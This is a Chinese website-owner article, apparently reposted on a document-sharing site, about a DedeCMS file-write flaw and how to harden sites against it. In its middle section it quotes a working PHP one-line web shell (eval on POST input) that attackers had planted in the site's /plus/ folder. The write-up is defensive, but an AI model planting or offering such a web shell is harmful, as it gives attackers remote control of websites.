- 1、本文档共2页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
谈Dedecms近期的一些隐患以及如何预防风险
谈Dedecms近期的一些隐患以及如何预防风险
dedecms一直是很火的建站cms,主要得益于两大站长网的鼎力支持;不过,
人火是非多,cms太火了同样会被别有用心的人盯上。我的网站一直在使用
dedecms,前段时间又一次受到攻击,攻击的目的很简单,那么便是黑链,知道
后稍微修改下代码就恢复了,不是很严重;这段时间网站又被莫名上传文件,类
似前一次,虽然对方还没来得及修改网站模板,不过这说明网站安全防患还未到
位,对方任何时候都可能再次取得管理员权限,所以要特别注意网站的安全防患
措施。
因为我比较喜欢寻根究底,所以就去网上找了一下相关的资料,发现这确实
是dedecms的漏洞,黑客可以利用多维的变量绕过正则检测,漏洞主要发生在
/plus/mytag_js.php中,原理便是准备一个MySQL数据库来攻击已知网站的数
据库,通过向数据库中写入一句话的代码,只要成功写入,那么以后便可以利用
这些代码来获得后台管理员权限。
结合我的网站被攻击已经别人类似的经历来看,黑客写入的文件主要存在于
/plus/文件夹下,目前已知的几个文件包括ga.php、log.php、b.php、b1.php
等,文件的特征便是短小,内容很少,可能写入的时候不是很方便,不过这些代
码的作用确实不小的。
下面这是ga.php文件中的部分代码:
titlelogin/titleno?php
eval($_POST[1])
?
titlelogin/titleno?php
eval($_POST[1])
?
titlelogin/titleno?php
eval($_POST[1])
?
实际的代码比上面截取的要长,不过都是这段代码的重复,至于 log.php
的代码,同这个类似,只有一句话,简单明了,如果你对网络安全稍有了解,那
么会知道是php一句话木马,使用部分指定的工具可以执行这段代码,预计是破
解密码的功能。
既然已经知道对方是利用什么样的漏洞,同时知道对方利用什么样的原理来
利用漏洞,那么要怎么预防这些危险的事发生呢?经过查询大量的资料,我初步
整理出下面这些预防漏洞被利用的步骤,希望对同样适用dedecms的站长朋友们
有所帮助。
一、升级版本打好补丁设置目录权限
这是官方对此的解决办法,不管你使用的是什么版本的dedecms,都要及时
在后台升级版本自动更新补丁,这是避免漏洞被利用的最重要的一步;同时官方
还提供设置目录的方法,主要是设置data、templets、uploads、a为可读写不
可执行权限;include、member、plus、后台管理目录等设置为可执行可读不可写
入权限;删除install及special目录,具体如何设置见官方说明。
二、修改admin账号及密码
黑客可能是利用默认admin账号,随后推测密码来破解的,所以修改默认的
admin账号非常重要,至于如何修改,方法很多,比较有效的是用phpadmin登
陆网站数据库,找到dede_admin数据库表(dede是数据库表前缀),修改其中
userid及pwd两项,其中密码一定要修改成f297a57a5a743894a0e4,这是默认
的密码admin;修改后去后台登陆,登陆dede后台后修改密码。
三、别的值得注意的地方
至于更多的细节,同样要注意,尽量别选择太廉价的空间,太廉价的空间很
容易出现服务器本身的安全问题,只要服务器出现问题,整个服务器下面的网站
都没救了。还有便是,如果没必要,尽量别开通会员注册什么的,使用起来很麻
烦;至于网站后台目录,不要写到robots.txt里面,同时每个月至少换一次,管
理员密码什么的同样要更换,避免和别的账号密码相同被推测出来。
本文由四川探索者论坛整理编辑
您可能关注的文档
最近下载
- 栏杆工程施工组织设计(技术标).doc
- 2024北京一零一中初二(下)期中物理及答案.docx
- 跨学科实践活动09+探究土壤酸碱性对植物生长的影响(教学课件)-2024-2025学年九年级化学跨学科实践活动教学课件+设计(人教版2024).pptx VIP
- 2024年山东省滨州市中考化学试题附解析答案.pptx VIP
- 违反中央八项规定精神清单80条PPT深入贯彻中央八项规定精神.pptx VIP
- 外研社新一代大学英语(基础篇)综合教程B2U4 iExplore 2.pptx VIP
- 3-哈利波特与阿兹卡班的囚徒 中英对白剧本.pdf VIP
- 2024年社区工作者考试必背1000题题库及答案.docx VIP
- 计算小达人3年级数学下册人教版.pptx
- 初始过程能力研究计划.xls VIP
文档评论(0)